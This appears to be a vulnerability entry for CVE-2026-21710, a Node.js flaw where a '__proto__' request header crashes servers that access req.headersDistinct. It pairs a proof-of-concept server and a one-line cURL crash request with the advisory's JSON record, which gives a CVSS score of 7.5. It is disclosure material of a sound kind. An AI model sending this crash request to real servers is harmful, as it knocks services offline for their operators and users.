CVE-2026-21710

// Vulnerable Server Example const http = require('http'); const server = http.createServer((req, res) => { console.log('Request received'); // Accessing req.headersDistinct triggers the vulnerability // when a header named "__proto__" is present in the request try { const distinctHeaders = req.headersDistinct; res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('Hello World'); } catch (e) { // This catch block might not work due to the sync nature of the throw in getter console.error('Caught error:', e); res.writeHead(500); res.end('Internal Server Error'); } }); server.listen(3000, () => { console.log('Server listening on port 3000'); }); /* Exploitation via cURL: Send a request with a header named "__proto__" curl -H "__proto__: payload" http://localhost:3000 Expected Result: The Node.js process will crash with an uncaught exception: TypeError: Object.prototype.push is not a function */

{"cve": {"id": "CVE-2026-21710", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:18.210", "lastModified": "2026-04-01T14:24:21.833", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw in Node.js HTTP request handling causes an uncaught `TypeError` when a request is received with a header named `__proto__` and the application accesses `req.headersDistinct`.\r\n\r\nWhen this occurs, `dest[\"__proto__\"]` resolves to `Object.prototype` rather than `undefined`, causing `.push()` to be called on a non-array. This exception is thrown synchronously inside a property getter and cannot be intercepted by `error` event listeners, meaning it cannot be handled without wrapping every `req.headersDistinct` access in a `try/catch`.\r\n\r\n* This vulnerability affects all Node.js HTTP servers on **20.x, 22.x, 24.x, and v25.x**"}, {"lang": "es", "value": "Un fallo en el manejo de solicitudes HTTP de Node.js provoca un 'TypeError' no capturado cuando se recibe una solicitud con un encabezado llamado '__proto__' y la aplicación accede a 'req.headersDistinct'.\n\nCuando esto ocurre, 'dest[\"__proto__\"]' se resuelve como 'Object.prototype' en lugar de 'undefined', lo que provoca que se llame a '.push()' en un no-array. Esta excepción se lanza sincrónicamente dentro de un accesor de propiedad y no puede ser interceptada por los oyentes de eventos 'error', lo que significa que no puede ser manejada sin envolver cada acceso a 'req.headersDistinct' en un 'try/catch'.\n\n* Esta vulnerabilidad afecta a todos los servidores HTTP de Node.js en 20.x, 22.x, 24.x y v25.x"}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://nodejs.org/en/blog/vulnerability/march-2026-security-releases", "source": "[email protected]"}]}}